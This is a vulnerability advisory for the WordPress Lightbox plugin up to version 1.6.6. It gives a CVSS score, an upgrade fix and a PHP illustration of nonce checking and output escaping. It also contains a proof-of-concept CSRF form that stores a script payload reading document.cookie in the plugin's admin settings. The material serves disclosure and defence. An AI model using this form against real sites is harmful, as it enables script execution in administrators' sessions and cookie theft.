Lightbox <= 1.6.6 CSRF Stored XSS

Homepage

https://wordpress.org/plugins/lightbox/

Overview

Due to a lack of CSRF mitigation and a lack of entity encoding in the output generated by /admin/view/huge_it_light_box.php, it is possible to store and execute scripts in the context of an admin user.

CVSS Score

4.8

CVSS Vector

(AV:N/AC:M/Au:N/C:P/I:P/A:N/E:F/RL:OF/RC:C)

Versions Affected

1.6.6 and below

Solution

Upgrade to version 1.6.8

Proof of Concept

<form action="http://[target]/wp-admin/admin.php?page=huge_it_light_box&hugeit_task=save" method="post">
  <input type="text" name="light_box_speed" value=""><script>alert(document.cookie)</script>">
  <input type="text" name="light_box_style" value="1" />
  <input type="text" name="light_box_transition" value="elastic" />
  <input type="text" name="light_box_fadeout" value="300" />
  <input type="text" name="light_box_title" value="false" />
  <input type="text" name="params[light_box_opacity]" value="20" />
  <input type="text" name="params[light_box_open]" value="false" />
  <input type="text" name="params[light_box_overlayclose]" value="false" />
  <input type="text" name="params[light_box_overlayclose]" value="true" />
  <input type="text" name="params[light_box_esckey]" value="false" />
  <input type="text" name="params[light_box_arrowkey]" value="false" />
  <input type="text" name="params[light_box_loop]" value="false" />
  <input type="text" name="params[light_box_loop]" value="true" />
  <input type="text" name="params[light_box_closebutton]" value="false" />
  <input type="text" name="params[light_box_closebutton]" value="true" />
  <input type="text" name="params[light_box_fixed]" value="false" />
  <input type="text" name="params[light_box_fixed]" value="true" />
  <input type="text" name="params[slider_title_position]" value="5" />
  <input type="text" name="params[light_box_size_fix]" value="false" />
  <input type="text" name="params[light_box_width]" value="500" />
  <input type="text" name="params[light_box_height]" value="500" />
  <input type="text" name="params[light_box_maxwidth]" value="768" />
  <input type="text" name="params[light_box_maxheight]" value="500" />
  <input type="text" name="params[light_box_initialwidth]" value="300" />
  <input type="text" name="params[light_box_initialheight]" value="100" />
  <input type="text" name="params[light_box_slideshow]" value="false" />
  <input type="text" name="params[light_box_slideshowspeed]" value="2500" />
  <input type="text" name="params[light_box_slideshowauto]" value="false" />
  <input type="text" name="params[light_box_slideshowauto]" value="true" />
  <input type="text" name="params[light_box_slideshowstart]" value="start slideshow" />
  <input type="text" name="params[light_box_slideshowstop]" value="stop slideshow" />
  <input type="text" name="params[watermarket_image]" value="false" />
  <input type="text" name="params[watermark_width]" value="0" />
  <input type="text" name="params[watermark_transparency]" value="0" />
  <input type="submit" value="submit">
</form>
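The two controls the overview says are missing, a CSRF nonce check on the save task and entity encoding when the stored value is rendered back into the admin view, shown on a hypothetical settings handler. This is an added illustration, not the plugin's own code; the option names, nonce/action names and the lb_example_ functions are assumptions, and only the light_box_speed and params[light_box_slideshowstart] field names come from the advisory.

```php
<?php
// Added illustration (not the plugin's actual code). Option names, the
// nonce/action names and lb_example_* functions are assumptions.

// --- Handler for the save task (hugeit_task=save) ---
function lb_example_handle_save() {
    // Settings changes require the capability to manage options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient privileges.', '', array( 'response' => 403 ) );
    }
    // CSRF mitigation: the POST must carry a nonce issued to this user for
    // this action. check_admin_referer() dies on a missing or invalid nonce,
    // so a cross-site form like the PoC above never reaches the save below.
    check_admin_referer( 'lb_example_save_settings', 'lb_example_nonce' );

    // Sanitize on input: speed is numeric, so keep only a non-negative integer.
    $speed = isset( $_POST['light_box_speed'] )
        ? absint( wp_unslash( $_POST['light_box_speed'] ) ) : 0;
    // Free-text labels get sanitize_text_field(), which strips tags.
    $start_label = isset( $_POST['params']['light_box_slideshowstart'] )
        ? sanitize_text_field( wp_unslash( $_POST['params']['light_box_slideshowstart'] ) )
        : '';

    update_option( 'lb_example_speed', $speed );
    update_option( 'lb_example_slideshowstart', $start_label );
}

// --- Admin view that re-displays the stored values ---
function lb_example_render_settings_form() {
    $speed       = get_option( 'lb_example_speed', 300 );
    $start_label = get_option( 'lb_example_slideshowstart', 'start slideshow' );
    ?>
    <form method="post"
          action="<?php echo esc_url( admin_url( 'admin.php?page=huge_it_light_box&hugeit_task=save' ) ); ?>">
        <?php wp_nonce_field( 'lb_example_save_settings', 'lb_example_nonce' ); ?>
        <!-- Entity encoding on output: esc_attr() turns a stored "><script>
             payload into &quot;&gt;&lt;script&gt;, so it stays inside the
             attribute value instead of closing it and starting a tag. -->
        <input type="text" name="light_box_speed"
               value="<?php echo esc_attr( $speed ); ?>" />
        <input type="text" name="params[light_box_slideshowstart]"
               value="<?php echo esc_attr( $start_label ); ?>" />
        <?php submit_button(); ?>
    </form>
    <?php
}
```

Either control alone closes the chain shown in the PoC: the nonce check stops the cross-site POST from being accepted, and esc_attr() stops an already-stored value from executing in the admin view.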
